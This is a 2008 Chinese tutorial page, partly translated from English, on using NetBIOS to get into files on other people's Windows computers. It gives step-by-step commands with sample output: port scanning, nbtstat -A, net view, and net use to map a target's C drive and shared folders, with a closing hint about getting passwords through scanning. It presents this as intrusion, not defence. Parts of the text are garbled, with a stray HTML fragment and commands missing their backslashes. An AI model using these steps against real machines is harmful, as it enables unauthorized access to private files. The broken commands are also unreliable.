利用NetBIOS浏览他人电脑中的资料
点击次数:17 次 发布日期:2008-11-29 18:28:21 作者:源代码网
|
源代码网推荐
|
_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">_blank>NetBIOS (Network basic input output system)即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
要远程使用NetBIOS,目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
如果结果如上,恭喜...
2. nbtstat
我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。
输入命令:
--------------------------------------------------------------------------------
c:>nbtstat -A 127.0.0.1
--------------------------------------------------------------------------------
如果使用IP地址就使用-A,使用主机名则使用-a.
运行后将获得如下信息:
code:--------------------------------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
--------------------------------------------------------------------------------
下面这一行
--------------------------------------------------------------------------------
computername <20> UNIQUE Registered --------------------------------------------------------------------------------
很有用,因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。
首先,我们需要知道硬盘名称等信息,并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令:
net view \ipaddress来完成。
输入:
--------------------------------------------------------------------------------
C:>net view \127.0.0.1
Shared resources at \xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------------------------------
应该获得如上显示信息 (在非XP系统中会有所不同).
该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑,我们可以使用net use。格式如下:
net use letter: \ipaddress
ame
输入:
--------------------------------------------------------------------------------
c:>net use g: \127.0.0.1SharedDocs
The command completed successfully.
c:>net use h: \127.0.0.1C
The command completed successfully.
--------------------------------------------------------------------------------
现在目标计算机的硬盘已映射为我们刚刚指定的盘符。(确保这一盘符不与本地电脑已使用盘符冲突)完成后就可以如同浏览本地电脑一样进行浏览 :
输入:
--------------------------------------------------------------------------------
c:>cd g:
g:>
--------------------------------------------------------------------------------
在windows XP中,可以直接打开“我的电脑”,在图形界面下浏览刚刚添加的映射盘.
完成后,记得要从机器中删除映射盘。
输入:
--------------------------------------------------------------------------------
c:>net use /delete g:
g: was deleted successfully.
--------------------------------------------------------------------------------
有些系统需要密码才可以进入 (win2k, WinNT): (可以通过扫描器扫描)
获得密码后可使用如下命令进入:
--------------------------------------------------------------------------------
net use password \ipsharename
|
|
源代码网整理以下
|
源代码网供稿.
